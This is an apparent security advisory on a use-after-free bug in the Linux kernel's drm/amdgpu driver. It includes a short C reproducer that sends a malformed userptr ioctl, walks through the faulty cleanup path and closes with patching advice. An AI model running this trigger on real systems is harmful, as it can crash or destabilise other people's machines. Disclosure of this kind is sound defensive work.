A use-after-free vulnerability has been resolved in the Linux kernel. The affected module is drm/amdgpu, and the bug can be triggered by sending a single amdgpu_gem_userptr_ioctl to the AMDGPU DRM driver, on any ASIC, with an invalid address and size. The vulnerability was reported by Joonkyo Jung.

The following code, for example, can trigger the bug:

#include <stdint.h>
#include <string.h>
#include <xf86drm.h>         /* drmIoctl(), from libdrm */
#include <drm/amdgpu_drm.h>  /* struct drm_amdgpu_gem_userptr (kernel UAPI header) */

static void Syzkaller1(int fd)
{
	struct drm_amdgpu_gem_userptr arg;
	int ret;

	memset(&arg, 0, sizeof(arg));
	arg.addr = 0xffffffffffff000;  /* invalid user address */
	arg.size = 0x80000000;         /* 2 GB */
	arg.flags = 0x7;
	/* 0xc1186451 is the DRM_IOCTL_AMDGPU_GEM_USERPTR request number */
	ret = drmIoctl(fd, 0xc1186451/*amdgpu_gem_userptr_ioctl*/, &arg);
	(void)ret;
}

Because of the invalid address and size, amdgpu_hmm_register fails in mmu_interval_notifier_insert->__mmu_interval_notifier_insert->check_shl_overflow. Even though amdgpu_hmm_register has failed, amdgpu_hmm_unregister is still called from amdgpu_gem_object_free, which leads to an access to a bad address. The issue can be reproduced with KASAN enabled, as seen in the stack trace below:

truncated---

The use-after-free bug in drm/amdgpu has been fixed in the kernel. More information about the patch and its implementation can be found in the original references below:

- Link to the original patch in the mailing list
- Linux kernel Git commit for the fix

To stay protected against this vulnerability, users are advised to update their Linux kernel to include the latest security patches. This will ensure that the use-after-free bug in drm/amdgpu is addressed, and the system remains secure against potential exploitation.

In conclusion, the Linux kernel has resolved the use-after-free vulnerability in the drm/amdgpu module. The vulnerability was reported by Joonkyo Jung, and it has been patched to prevent potential exploitation. Users are advised to keep their kernel up to date with the latest security patches to avoid security risks.

Timeline

Published on: 04/02/2024 07:15:42 UTC
Last modified on: 05/29/2024 05:20:16 UTC